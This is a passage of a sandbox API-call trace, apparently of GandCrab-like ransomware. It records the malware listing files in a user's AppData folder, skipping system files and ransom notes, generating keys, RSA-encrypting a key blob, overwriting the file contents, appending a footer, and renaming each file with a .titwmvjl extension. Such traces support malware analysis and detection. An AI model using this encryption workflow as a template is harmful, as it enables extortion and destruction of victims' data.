dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5037b8) returned 1 [0085.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.481] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.481] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.482] GetLastError () returned 0x0 [0085.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.482] CryptDestroyKey (hKey=0x5037b8) returned 1 [0085.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.482] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.482] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.483] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.483] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x11c19, lpOverlapped=0x0) returned 1 [0085.505] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffee3e7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.506] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x11c19, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x11c19, lpOverlapped=0x0) returned 1 [0085.508] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.508] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0085.510] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.515] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.516] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.516] CloseHandle (hObject=0x2b4) returned 1 [0085.517] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\oqrdlux1aasf2yv.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\OQRDlux1AASf2Yv.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\oqrdlux1aasf2yv.png.titwmvjl"), dwFlags=0x1) returned 1 [0085.520] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.520] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0085.520] lstrcmpW (lpString1="pflL.mp3", lpString2=".") returned 1 [0085.520] lstrcmpW (lpString1="pflL.mp3", lpString2="..") returned 1 [0085.520] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="pflL.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3" [0085.520] lstrlenW (lpString=".titwmvjl") returned 9 [0085.520] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3") returned 46 [0085.520] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.520] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3.titwmvjl") returned 55 [0085.521] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3") returned 46 [0085.521] lstrlenW (lpString=".mp3") returned 4 [0085.521] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.521] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0085.521] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0085.521] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.521] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3") returned 46 [0085.521] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3") returned 46 [0085.521] lstrcmpiW (lpString1="pflL.mp3", lpString2="desktop.ini") returned 1 [0085.521] lstrcmpiW (lpString1="pflL.mp3", lpString2="autorun.inf") returned 1 [0085.521] lstrcmpiW (lpString1="pflL.mp3", lpString2="ntuser.dat") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="iconcache.db") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="bootsect.bak") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="boot.ini") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="ntuser.dat.log") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="thumbs.db") returned -1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="ntldr") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="NTDETECT.COM") returned 1 [0085.522] lstrcmpiW (lpString1="pflL.mp3", lpString2="Bootfont.bin") returned 1 [0085.522] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3") returned 46 [0085.522] lstrlenW (lpString=".mp3") returned 4 [0085.522] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.522] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0085.522] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.523] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.523] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\pfll.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0085.524] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.524] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0085.525] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.525] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.528] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.528] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.528] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.528] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0085.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.528] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.529] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.529] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.530] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.531] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.531] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.531] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0085.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.531] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.531] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.531] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.532] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.534] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503478) returned 1 [0085.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.534] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.535] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.535] GetLastError () returned 0x0 [0085.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.535] CryptDestroyKey (hKey=0x503478) returned 1 [0085.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.536] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.536] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.538] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503338) returned 1 [0085.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.539] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.539] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.539] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.539] GetLastError () returned 0x0 [0085.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.540] CryptDestroyKey (hKey=0x503338) returned 1 [0085.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.540] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.540] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.540] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.541] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0xf94b, lpOverlapped=0x0) returned 1 [0085.709] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff06b5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf94b, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0xf94b, lpOverlapped=0x0) returned 1 [0085.714] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.715] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0085.716] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.724] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.724] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.724] CloseHandle (hObject=0x2b4) returned 1 [0085.725] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\pfll.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\pflL.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\pfll.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0085.726] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.727] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0085.727] lstrcmpW (lpString1="qcfzOGJP.ods", lpString2=".") returned 1 [0085.727] lstrcmpW (lpString1="qcfzOGJP.ods", lpString2="..") returned 1 [0085.727] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="qcfzOGJP.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods" [0085.727] lstrlenW (lpString=".titwmvjl") returned 9 [0085.727] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods") returned 50 [0085.727] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0085.727] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods.titwmvjl") returned 59 [0085.728] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods") returned 50 [0085.728] lstrlenW (lpString=".ods") returned 4 [0085.728] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.728] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ods ") returned 5 [0085.728] lstrcmpiW (lpString1=".ods", lpString2=".titwmvjl") returned -1 [0085.728] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.728] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods") returned 50 [0085.728] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods") returned 50 [0085.728] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="desktop.ini") returned 1 [0085.728] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="autorun.inf") returned 1 [0085.728] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="ntuser.dat") returned 1 [0085.728] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="iconcache.db") returned 1 [0085.728] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="bootsect.bak") returned 1 [0085.728] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="boot.ini") returned 1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="ntuser.dat.log") returned 1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="thumbs.db") returned -1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="KRAB-DECRYPT.html") returned 1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="CRAB-DECRYPT.html") returned 1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="ntldr") returned 1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="NTDETECT.COM") returned 1 [0085.729] lstrcmpiW (lpString1="qcfzOGJP.ods", lpString2="Bootfont.bin") returned 1 [0085.729] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods") returned 50 [0085.729] lstrlenW (lpString=".ods") returned 4 [0085.729] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.729] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ods ") returned 5 [0085.729] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.730] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0085.730] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\qcfzogjp.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0085.731] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.731] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0085.732] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.732] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.733] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.735] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.735] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.736] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.736] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0085.736] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.736] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.736] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.737] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.737] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0085.739] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0085.739] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0085.739] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0085.739] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0085.739] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.740] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.740] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.740] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.740] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.742] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.742] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503938) returned 1 [0085.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.743] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.743] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.744] GetLastError () returned 0x0 [0085.744] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.744] CryptDestroyKey (hKey=0x503938) returned 1 [0085.744] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.744] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.744] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.745] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0085.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.747] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0085.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.747] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0085.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.747] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0085.748] GetLastError () returned 0x0 [0085.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.749] CryptDestroyKey (hKey=0x503378) returned 1 [0085.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0085.749] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0085.749] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0085.749] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0085.750] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x6a46, lpOverlapped=0x0) returned 1 [0085.772] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff95ba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.772] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6a46, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x6a46, lpOverlapped=0x0) returned 1 [0085.774] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.774] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0085.776] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.783] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.783] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.784] CloseHandle (hObject=0x2b4) returned 1 [0085.785] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\qcfzogjp.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\qcfzOGJP.ods.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\qcfzogjp.ods.titwmvjl"), dwFlags=0x1) returned 1 [0085.786] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, 